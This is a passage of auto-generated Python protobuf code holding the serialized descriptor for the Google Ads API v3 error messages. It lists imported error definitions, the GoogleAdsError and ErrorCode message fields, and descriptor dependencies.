s/googleads_v3/proto/errors/keyword_plan_ad_group_error.proto\x1a\x46google/ads/googleads_v3/proto/errors/keyword_plan_campaign_error.proto\x1a=google/ads/googleads_v3/proto/errors/keyword_plan_error.proto\x1a\x42google/ads/googleads_v3/proto/errors/keyword_plan_idea_error.proto\x1a\x45google/ads/googleads_v3/proto/errors/keyword_plan_keyword_error.proto\x1aNgoogle/ads/googleads_v3/proto/errors/keyword_plan_negative_keyword_error.proto\x1a\x36google/ads/googleads_v3/proto/errors/label_error.proto\x1a>google/ads/googleads_v3/proto/errors/language_code_error.proto\x1a?google/ads/googleads_v3/proto/errors/list_operation_error.proto\x1a=google/ads/googleads_v3/proto/errors/manager_link_error.proto\x1a=google/ads/googleads_v3/proto/errors/media_bundle_error.proto\x1a;google/ads/googleads_v3/proto/errors/media_file_error.proto\x1a=google/ads/googleads_v3/proto/errors/media_upload_error.proto\x1a;google/ads/googleads_v3/proto/errors/multiplier_error.proto\x1a\x37google/ads/googleads_v3/proto/errors/mutate_error.proto\x1a;google/ads/googleads_v3/proto/errors/mutate_job_error.proto\x1a\x46google/ads/googleads_v3/proto/errors/new_resource_creation_error.proto\x1a:google/ads/googleads_v3/proto/errors/not_empty_error.proto\x1a@google/ads/googleads_v3/proto/errors/not_whitelisted_error.proto\x1a\x35google/ads/googleads_v3/proto/errors/null_error.proto\x1a\x46google/ads/googleads_v3/proto/errors/offline_user_data_job_error.proto\x1aHgoogle/ads/googleads_v3/proto/errors/operation_access_denied_error.proto\x1a\x39google/ads/googleads_v3/proto/errors/operator_error.proto\x1a@google/ads/googleads_v3/proto/errors/partial_failure_error.proto\x1a\x41google/ads/googleads_v3/proto/errors/payments_account_error.proto\x1a?google/ads/googleads_v3/proto/errors/policy_finding_error.proto\x1aLgoogle/ads/googleads_v3/proto/errors/policy_validation_parameter_error.proto\x1a\x41google/ads/googleads_v3/proto/errors/policy_violation_error.proto\x1a\x36google/ads/googleads_v3/proto/errors/query_error.proto\x1a\x36google/ads/googleads_v3/proto/errors/quota_error.proto\x1a\x36google/ads/googleads_v3/proto/errors/range_error.proto\x1a;google/ads/googleads_v3/proto/errors/reach_plan_error.proto\x1a?google/ads/googleads_v3/proto/errors/recommendation_error.proto\x1a<google/ads/googleads_v3/proto/errors/region_code_error.proto\x1a\x38google/ads/googleads_v3/proto/errors/request_error.proto\x1aGgoogle/ads/googleads_v3/proto/errors/resource_access_denied_error.proto\x1aNgoogle/ads/googleads_v3/proto/errors/resource_count_limit_exceeded_error.proto\x1a\x38google/ads/googleads_v3/proto/errors/setting_error.proto\x1a\x41google/ads/googleads_v3/proto/errors/shared_criterion_error.proto\x1a;google/ads/googleads_v3/proto/errors/shared_set_error.proto\x1a;google/ads/googleads_v3/proto/errors/size_limit_error.proto\x1a>google/ads/googleads_v3/proto/errors/string_format_error.proto\x1a>google/ads/googleads_v3/proto/errors/string_length_error.proto\x1a:google/ads/googleads_v3/proto/errors/time_zone_error.proto\x1a:google/ads/googleads_v3/proto/errors/url_field_error.proto\x1a:google/ads/googleads_v3/proto/errors/user_data_error.proto\x1a:google/ads/googleads_v3/proto/errors/user_list_error.proto\x1aKgoogle/ads/googleads_v3/proto/errors/youtube_video_registration_error.proto\x1a\x1egoogle/protobuf/wrappers.proto\x1a\x1cgoogle/api/annotations.proto\"R\n\x10GoogleAdsFailure\x12>\n\x06\x65rrors\x18\x01 \x03(\x0b\x32..google.ads.googleads.v3.errors.GoogleAdsError\"\x98\x02\n\x0eGoogleAdsError\x12=\n\nerror_code\x18\x01 \x01(\x0b\x32).google.ads.googleads.v3.errors.ErrorCode\x12\x0f\n\x07message\x18\x02 \x01(\t\x12\x36\n\x07trigger\x18\x03 \x01(\x0b\x32%.google.ads.googleads.v3.common.Value\x12?\n\x08location\x18\x04 \x01(\x0b\x32-.google.ads.googleads.v3.errors.ErrorLocation\x12=\n\x07\x64\x65tails\x18\x05 \x01(\x0b\x32,.google.ads.googleads.v3.errors.ErrorDetails\"\xcbZ\n\tErrorCode\x12V\n\rrequest_error\x18\x01 \x01(\x0e\x32=.google.ads.googleads.v3.errors.RequestErrorEnum.RequestErrorH\x00\x12o\n\x16\x62idding_strategy_error\x18\x02 \x01(\x0e\x32M.google.ads.googleads.v3.errors.BiddingStrategyErrorEnum.BiddingStrategyErrorH\x00\x12Z\n\x0furl_field_error\x18\x03 \x01(\x0e\x32?.google.ads.googleads.v3.errors.UrlFieldErrorEnum.UrlFieldErrorH\x00\x12i\n\x14list_operation_error\x18\x04 \x01(\x0e\x32I.google.ads.googleads.v3.errors.ListOperationErrorEnum.ListOperationErrorH\x00\x12P\n\x0bquery_error\x18\x05 \x01(\x0e\x32\x39.google.ads.googleads.v3.errors.QueryErrorEnum.QueryErrorH\x00\x12S\n\x0cmutate_error\x18\x07 \x01(\x0e\x32;.google.ads.googleads.v3.errors.MutateErrorEnum.MutateErrorH\x00\x12]\n\x10\x66ield_mask_error\x18\x08 \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.FieldMaskErrorEnum.FieldMaskErrorH\x00\x12h\n\x13\x61uthorization_error\x18\t \x01(\x0e\x32I.google.ads.googleads.v3.errors.AuthorizationErrorEnum.AuthorizationErrorH\x00\x12Y\n\x0einternal_error\x18\n \x01(\x0e\x32?.google.ads.googleads.v3.errors.InternalErrorEnum.InternalErrorH\x00\x12P\n\x0bquota_error\x18\x0b \x01(\x0e\x32\x39.google.ads.googleads.v3.errors.QuotaErrorEnum.QuotaErrorH\x00\x12G\n\x08\x61\x64_error\x18\x0c \x01(\x0e\x32\x33.google.ads.googleads.v3.errors.AdErrorEnum.AdErrorH\x00\x12W\n\x0e\x61\x64_group_error\x18\r \x01(\x0e\x32=.google.ads.googleads.v3.errors.AdGroupErrorEnum.AdGroupErrorH\x00\x12l\n\x15\x63\x61mpaign_budget_error\x18\x0e \x01(\x0e\x32K.google.ads.googleads.v3.errors.CampaignBudgetErrorEnum.CampaignBudgetErrorH\x00\x12Y\n\x0e\x63\x61mpaign_error\x18\x0f \x01(\x0e\x32?.google.ads.googleads.v3.errors.CampaignErrorEnum.CampaignErrorH\x00\x12k\n\x14\x61uthentication_error\x18\x11 \x01(\x0e\x32K.google.ads.googleads.v3.errors.AuthenticationErrorEnum.AuthenticationErrorH\x00\x12s\n\x18\x61\x64_group_criterion_error\x18\x12 \x01(\x0e\x32O.google.ads.googleads.v3.errors.AdGroupCriterionErrorEnum.AdGroupCriterionErrorH\x00\x12\x66\n\x13\x61\x64_customizer_error\x18\x13 \x01(\x0e\x32G.google.ads.googleads.v3.errors.AdCustomizerErrorEnum.AdCustomizerErrorH\x00\x12^\n\x11\x61\x64_group_ad_error\x18\x15 \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.AdGroupAdErrorEnum.AdGroupAdErrorH\x00\x12]\n\x10\x61\x64_sharing_error\x18\x18 \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.AdSharingErrorEnum.AdSharingErrorH\x00\x12J\n\tadx_error\x18\x19 \x01(\x0e\x32\x35.google.ads.googleads.v3.errors.AdxErrorEnum.AdxErrorH\x00\x12P\n\x0b\x61sset_error\x18k \x01(\x0e\x32\x39.google.ads.googleads.v3.errors.AssetErrorEnum.AssetErrorH\x00\x12V\n\rbidding_error\x18\x1a \x01(\x0e\x32=.google.ads.googleads.v3.errors.BiddingErrorEnum.BiddingErrorH\x00\x12u\n\x18\x63\x61mpaign_criterion_error\x18\x1d \x01(\x0e\x32Q.google.ads.googleads.v3.errors.CampaignCriterionErrorEnum.CampaignCriterionErrorH\x00\x12l\n\x15\x63ollection_size_error\x18\x1f \x01(\x0e\x32K.google.ads.googleads.v3.errors.CollectionSizeErrorEnum.CollectionSizeErrorH\x00\x12\x63\n\x12\x63ountry_code_error\x18m \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.CountryCodeErrorEnum.CountryCodeErrorH\x00\x12\\\n\x0f\x63riterion_error\x18 \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.CriterionErrorEnum.CriterionErrorH\x00\x12Y\n\x0e\x63ustomer_error\x18Z \x01(\x0e\x32?.google.ads.googleads.v3.errors.CustomerErrorEnum.CustomerErrorH\x00\x12M\n\ndate_error\x18! \x01(\x0e\x32\x37.google.ads.googleads.v3.errors.DateErrorEnum.DateErrorH\x00\x12]\n\x10\x64\x61te_range_error\x18\" \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.DateRangeErrorEnum.DateRangeErrorH\x00\x12Y\n\x0e\x64istinct_error\x18# \x01(\x0e\x32?.google.ads.googleads.v3.errors.DistinctErrorEnum.DistinctErrorH\x00\x12\x85\x01\n\x1e\x66\x65\x65\x64_attribute_reference_error\x18$ \x01(\x0e\x32[.google.ads.googleads.v3.errors.FeedAttributeReferenceErrorEnum.FeedAttributeReferenceErrorH\x00\x12Y\n\x0e\x66unction_error\x18% \x01(\x0e\x32?.google.ads.googleads.v3.errors.FunctionErrorEnum.FunctionErrorH\x00\x12o\n\x16\x66unction_parsing_error\x18& \x01(\x0e\x32M.google.ads.googleads.v3.errors.FunctionParsingErrorEnum.FunctionParsingErrorH\x00\x12G\n\x08id_error\x18\' \x01(\x0e\x32\x33.google.ads.googleads.v3.errors.IdErrorEnum.IdErrorH\x00\x12P\n\x0bimage_error\x18( \x01(\x0e\x32\x39.google.ads.googleads.v3.errors.ImageErrorEnum.ImageErrorH\x00\x12\x66\n\x13language_code_error\x18n \x01(\x0e\x32G.google.ads.googleads.v3.errors.LanguageCodeErrorEnum.LanguageCodeErrorH\x00\x12\x63\n\x12media_bundle_error\x18* \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.MediaBundleErrorEnum.MediaBundleErrorH\x00\x12\x63\n\x12media_upload_error\x18t \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.MediaUploadErrorEnum.MediaUploadErrorH\x00\x12]\n\x10media_file_error\x18V \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.MediaFileErrorEnum.MediaFileErrorH\x00\x12_\n\x10multiplier_error\x18, \x01(\x0e\x32\x43.google.ads.googleads.v3.errors.MultiplierErrorEnum.MultiplierErrorH\x00\x12|\n\x1bnew_resource_creation_error\x18- \x01(\x0e\x32U.google.ads.googleads.v3.errors.NewResourceCreationErrorEnum.NewResourceCreationErrorH\x00\x12Z\n\x0fnot_empty_error\x18. \x01(\x0e\x32?.google.ads.googleads.v3.errors.NotEmptyErrorEnum.NotEmptyErrorH\x00\x12M\n\nnull_error\x18/ \x01(\x0e\x32\x37.google.ads.googleads.v3.errors.NullErrorEnum.NullErrorH\x00\x12Y\n\x0eoperator_error\x18\x30 \x01(\x0e\x32?.google.ads.googleads.v3.errors.OperatorErrorEnum.OperatorErrorH\x00\x12P\n\x0brange_error\x18\x31 \x01(\x0e\x32\x39.google.ads.googleads.v3.errors.RangeErrorEnum.RangeErrorH\x00\x12k\n\x14recommendation_error\x18: \x01(\x0e\x32K.google.ads.googleads.v3.errors.RecommendationErrorEnum.RecommendationErrorH\x00\x12`\n\x11region_code_error\x18\x33 \x01(\x0e\x32\x43.google.ads.googleads.v3.errors.RegionCodeErrorEnum.RegionCodeErrorH\x00\x12V\n\rsetting_error\x18\x34 \x01(\x0e\x32=.google.ads.googleads.v3.errors.SettingErrorEnum.SettingErrorH\x00\x12\x66\n\x13string_format_error\x18\x35 \x01(\x0e\x32G.google.ads.googleads.v3.errors.StringFormatErrorEnum.StringFormatErrorH\x00\x12\x66\n\x13string_length_error\x18\x36 \x01(\x0e\x32G.google.ads.googleads.v3.errors.StringLengthErrorEnum.StringLengthErrorH\x00\x12\x82\x01\n\x1doperation_access_denied_error\x18\x37 \x01(\x0e\x32Y.google.ads.googleads.v3.errors.OperationAccessDeniedErrorEnum.OperationAccessDeniedErrorH\x00\x12\x7f\n\x1cresource_access_denied_error\x18\x38 \x01(\x0e\x32W.google.ads.googleads.v3.errors.ResourceAccessDeniedErrorEnum.ResourceAccessDeniedErrorH\x00\x12\x92\x01\n#resource_count_limit_exceeded_error\x18\x39 \x01(\x0e\x32\x63.google.ads.googleads.v3.errors.ResourceCountLimitExceededErrorEnum.ResourceCountLimitExceededErrorH\x00\x12\x8b\x01\n youtube_video_registration_error\x18u \x01(\x0e\x32_.google.ads.googleads.v3.errors.YoutubeVideoRegistrationErrorEnum.YoutubeVideoRegistrationErrorH\x00\x12z\n\x1b\x61\x64_group_bid_modifier_error\x18; \x01(\x0e\x32S.google.ads.googleads.v3.errors.AdGroupBidModifierErrorEnum.AdGroupBidModifierErrorH\x00\x12V\n\rcontext_error\x18< \x01(\x0e\x32=.google.ads.googleads.v3.errors.ContextErrorEnum.ContextErrorH\x00\x12P\n\x0b\x66ield_error\x18= \x01(\x0e\x32\x39.google.ads.googleads.v3.errors.FieldErrorEnum.FieldErrorH\x00\x12]\n\x10shared_set_error\x18> \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.SharedSetErrorEnum.SharedSetErrorH\x00\x12o\n\x16shared_criterion_error\x18? \x01(\x0e\x32M.google.ads.googleads.v3.errors.SharedCriterionErrorEnum.SharedCriterionErrorH\x00\x12v\n\x19\x63\x61mpaign_shared_set_error\x18@ \x01(\x0e\x32Q.google.ads.googleads.v3.errors.CampaignSharedSetErrorEnum.CampaignSharedSetErrorH\x00\x12r\n\x17\x63onversion_action_error\x18\x41 \x01(\x0e\x32O.google.ads.googleads.v3.errors.ConversionActionErrorEnum.ConversionActionErrorH\x00\x12\x91\x01\n\"conversion_adjustment_upload_error\x18s \x01(\x0e\x32\x63.google.ads.googleads.v3.errors.ConversionAdjustmentUploadErrorEnum.ConversionAdjustmentUploadErrorH\x00\x12r\n\x17\x63onversion_upload_error\x18o \x01(\x0e\x32O.google.ads.googleads.v3.errors.ConversionUploadErrorEnum.ConversionUploadErrorH\x00\x12S\n\x0cheader_error\x18\x42 \x01(\x0e\x32;.google.ads.googleads.v3.errors.HeaderErrorEnum.HeaderErrorH\x00\x12Y\n\x0e\x64\x61tabase_error\x18\x43 \x01(\x0e\x32?.google.ads.googleads.v3.errors.DatabaseErrorEnum.DatabaseErrorH\x00\x12i\n\x14policy_finding_error\x18\x44 \x01(\x0e\x32I.google.ads.googleads.v3.errors.PolicyFindingErrorEnum.PolicyFindingErrorH\x00\x12M\n\nenum_error\x18\x46 \x01(\x0e\x32\x37.google.ads.googleads.v3.errors.EnumErrorEnum.EnumErrorH\x00\x12\x63\n\x12keyword_plan_error\x18G \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.KeywordPlanErrorEnum.KeywordPlanErrorH\x00\x12|\n\x1bkeyword_plan_campaign_error\x18H \x01(\x0e\x32U.google.ads.googleads.v3.errors.KeywordPlanCampaignErrorEnum.KeywordPlanCampaignErrorH\x00\x12\x92\x01\n#keyword_plan_negative_keyword_error\x18I \x01(\x0e\x32\x63.google.ads.googleads.v3.errors.KeywordPlanNegativeKeywordErrorEnum.KeywordPlanNegativeKeywordErrorH\x00\x12z\n\x1bkeyword_plan_ad_group_error\x18J \x01(\x0e\x32S.google.ads.googleads.v3.errors.KeywordPlanAdGroupErrorEnum.KeywordPlanAdGroupErrorH\x00\x12y\n\x1akeyword_plan_keyword_error\x18K \x01(\x0e\x32S.google.ads.googleads.v3.errors.KeywordPlanKeywordErrorEnum.KeywordPlanKeywordErrorH\x00\x12p\n\x17keyword_plan_idea_error\x18L \x01(\x0e\x32M.google.ads.googleads.v3.errors.KeywordPlanIdeaErrorEnum.KeywordPlanIdeaErrorH\x00\x12\x82\x01\n\x1d\x61\x63\x63ount_budget_proposal_error\x18M \x01(\x0e\x32Y.google.ads.googleads.v3.errors.AccountBudgetProposalErrorEnum.AccountBudgetProposalErrorH\x00\x12Z\n\x0fuser_list_error\x18N \x01(\x0e\x32?.google.ads.googleads.v3.errors.UserListErrorEnum.UserListErrorH\x00\x12\x66\n\x13\x63hange_status_error\x18O \x01(\x0e\x32G.google.ads.googleads.v3.errors.ChangeStatusErrorEnum.ChangeStatusErrorH\x00\x12M\n\nfeed_error\x18P \x01(\x0e\x32\x37.google.ads.googleads.v3.errors.FeedErrorEnum.FeedErrorH\x00\x12\x95\x01\n$geo_target_constant_suggestion_error\x18Q \x01(\x0e\x32\x65.google.ads.googleads.v3.errors.GeoTargetConstantSuggestionErrorEnum.GeoTargetConstantSuggestionErrorH\x00\x12i\n\x14\x63\x61mpaign_draft_error\x18R \x01(\x0e\x32I.google.ads.googleads.v3.errors.CampaignDraftErrorEnum.CampaignDraftErrorH\x00\x12Z\n\x0f\x66\x65\x65\x64_item_error\x18S \x01(\x0e\x32?.google.ads.googleads.v3.errors.FeedItemErrorEnum.FeedItemErrorH\x00\x12P\n\x0blabel_error\x18T \x01(\x0e\x32\x39.google.ads.googleads.v3.errors.LabelErrorEnum.LabelErrorH\x00\x12\x66\n\x13\x62illing_setup_error\x18W \x01(\x0e\x32G.google.ads.googleads.v3.errors.BillingSetupErrorEnum.BillingSetupErrorH\x00\x12y\n\x1a\x63ustomer_client_link_error\x18X \x01(\x0e\x32S.google.ads.googleads.v3.errors.CustomerClientLinkErrorEnum.CustomerClientLinkErrorH\x00\x12|\n\x1b\x63ustomer_manager_link_error\x18[ \x01(\x0e\x32U.google.ads.googleads.v3.errors.CustomerManagerLinkErrorEnum.CustomerManagerLinkErrorH\x00\x12\x63\n\x12\x66\x65\x65\x64_mapping_error\x18\\ \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.FeedMappingErrorEnum.FeedMappingErrorH\x00\x12\x66\n\x13\x63ustomer_feed_error\x18] \x01(\x0e\x32G.google.ads.googleads.v3.errors.CustomerFeedErrorEnum.CustomerFeedErrorH\x00\x12\x64\n\x13\x61\x64_group_feed_error\x18^ \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.AdGroupFeedErrorEnum.AdGroupFeedErrorH\x00\x12\x66\n\x13\x63\x61mpaign_feed_error\x18` \x01(\x0e\x32G.google.ads.googleads.v3.errors.CampaignFeedErrorEnum.CampaignFeedErrorH\x00\x12l\n\x15\x63ustom_interest_error\x18\x61 \x01(\x0e\x32K.google.ads.googleads.v3.errors.CustomInterestErrorEnum.CustomInterestErrorH\x00\x12x\n\x19\x63\x61mpaign_experiment_error\x18\x62 \x01(\x0e\x32S.google.ads.googleads.v3.errors.CampaignExperimentErrorEnum.CampaignExperimentErrorH\x00\x12v\n\x19\x65xtension_feed_item_error\x18\x64 \x01(\x0e\x32Q.google.ads.googleads.v3.errors.ExtensionFeedItemErrorEnum.ExtensionFeedItemErrorH\x00\x12\x63\n\x12\x61\x64_parameter_error\x18\x65 \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.AdParameterErrorEnum.AdParameterErrorH\x00\x12y\n\x1a\x66\x65\x65\x64_item_validation_error\x18\x66 \x01(\x0e\x32S.google.ads.googleads.v3.errors.FeedItemValidationErrorEnum.FeedItemValidationErrorH\x00\x12r\n\x17\x65xtension_setting_error\x18g \x01(\x0e\x32O.google.ads.googleads.v3.errors.ExtensionSettingErrorEnum.ExtensionSettingErrorH\x00\x12m\n\x16\x66\x65\x65\x64_item_target_error\x18h \x01(\x0e\x32K.google.ads.googleads.v3.errors.FeedItemTargetErrorEnum.FeedItemTargetErrorH\x00\x12o\n\x16policy_violation_error\x18i \x01(\x0e\x32M.google.ads.googleads.v3.errors.PolicyViolationErrorEnum.PolicyViolationErrorH\x00\x12]\n\x10mutate_job_error\x18l \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.MutateJobErrorEnum.MutateJobErrorH\x00\x12l\n\x15partial_failure_error\x18p \x01(\x0e\x32K.google.ads.googleads.v3.errors.PartialFailureErrorEnum.PartialFailureErrorH\x00\x12\x8e\x01\n!policy_validation_parameter_error\x18r \x01(\x0e\x32\x61.google.ads.googleads.v3.errors.PolicyValidationParameterErrorEnum.PolicyValidationParameterErrorH\x00\x12]\n\x10size_limit_error\x18v \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.SizeLimitErrorEnum.SizeLimitErrorH\x00\x12z\n\x1boffline_user_data_job_error\x18w \x01(\x0e\x32S.google.ads.googleads.v3.errors.OfflineUserDataJobErrorEnum.OfflineUserDataJobErrorH\x00\x12l\n\x15not_whitelisted_error\x18x \x01(\x0e\x32K.google.ads.googleads.v3.errors.NotWhitelistedErrorEnum.NotWhitelistedErrorH\x00\x12\x63\n\x12manager_link_error\x18y \x01(\x0e\x32\x45.google.ads.googleads.v3.errors.ManagerLinkErrorEnum.ManagerLinkErrorH\x00\x12\x66\n\x13\x63urrency_code_error\x18z \x01(\x0e\x32G.google.ads.googleads.v3.errors.CurrencyCodeErrorEnum.CurrencyCodeErrorH\x00\x12r\n\x17\x61\x63\x63\x65ss_invitation_error\x18| \x01(\x0e\x32O.google.ads.googleads.v3.errors.AccessInvitationErrorEnum.AccessInvitationErrorH\x00\x12]\n\x10reach_plan_error\x18} \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.ReachPlanErrorEnum.ReachPlanErrorH\x00\x12V\n\rinvoice_error\x18~ \x01(\x0e\x32=.google.ads.googleads.v3.errors.InvoiceErrorEnum.InvoiceErrorH\x00\x12o\n\x16payments_account_error\x18\x7f \x01(\x0e\x32M.google.ads.googleads.v3.errors.PaymentsAccountErrorEnum.PaymentsAccountErrorH\x00\x12[\n\x0ftime_zone_error\x18\x80\x01 \x01(\x0e\x32?.google.ads.googleads.v3.errors.TimeZoneErrorEnum.TimeZoneErrorH\x00\x12^\n\x10\x61sset_link_error\x18\x81\x01 \x01(\x0e\x32\x41.google.ads.googleads.v3.errors.AssetLinkErrorEnum.AssetLinkErrorH\x00\x12[\n\x0fuser_data_error\x18\x82\x01 \x01(\x0e\x32?.google.ads.googleads.v3.errors.UserDataErrorEnum.UserDataErrorH\x00\x42\x0c\n\nerror_code\"\xc0\x01\n\rErrorLocation\x12[\n\x13\x66ield_path_elements\x18\x02 \x03(\x0b\x32>.google.ads.googleads.v3.errors.ErrorLocation.FieldPathElement\x1aR\n\x10\x46ieldPathElement\x12\x12\n\nfield_name\x18\x01 \x01(\t\x12*\n\x05index\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\"\xde\x01\n\x0c\x45rrorDetails\x12\x1e\n\x16unpublished_error_code\x18\x01 \x01(\t\x12X\n\x18policy_violation_details\x18\x02 \x01(\x0b\x32\x36.google.ads.googleads.v3.errors.PolicyViolationDetails\x12T\n\x16policy_finding_details\x18\x03 \x01(\x0b\x32\x34.google.ads.googleads.v3.errors.PolicyFindingDetails\"\xb3\x01\n\x16PolicyViolationDetails\x12#\n\x1b\x65xternal_policy_description\x18\x02 \x01(\t\x12?\n\x03key\x18\x04 \x01(\x0b\x32\x32.google.ads.googleads.v3.common.PolicyViolationKey\x12\x1c\n\x14\x65xternal_policy_name\x18\x05 \x01(\t\x12\x15\n\ris_exemptible\x18\x06 \x01(\x08\"f\n\x14PolicyFindingDetails\x12N\n\x14policy_topic_entries\x18\x01 \x03(\x0b\x32\x30.google.ads.googleads.v3.common.PolicyTopicEntryB\xe6\x01\n\"com.google.ads.googleads.v3.errorsB\x0b\x45rrorsProtoP\x01ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v3/errors;errors\xa2\x02\x03GAA\xaa\x02\x1eGoogle.Ads.GoogleAds.V3.Errors\xca\x02\x1eGoogle\\Ads\\GoogleAds\\V3\\Errors\xea\x02\"Google::Ads::GoogleAds::V3::Errorsb\x06proto3')
,
dependencies=[google_dot_ads_dot_googleads__v3_dot_proto_dot_common_dot_policy__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_common_dot_value__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_access__invitation__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_account__budget__proposal__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__customizer__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__ad__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__bid__modifier__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__criterion__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__feed__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__parameter__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__sharing__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_adx__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_asset__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_asset__link__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_authentication__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_authorization__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_bidding__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_bidding__strategy__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_billing__setup__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__budget__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__criterion__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__draft__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__experiment__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__feed__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__shared__set__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_change__status__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_collection__size__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_context__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__action__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__adjustment__upload__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__upload__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_country__code__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_criterion__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_currency__code__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_custom__interest__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__client__link__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__feed__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__manager__link__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_database__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_date__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_date__range__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_distinct__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_enum__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_extension__feed__item__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_extension__setting__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__attribute__reference__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__target__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__validation__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__mapping__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_field__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_field__mask__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_function__error__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_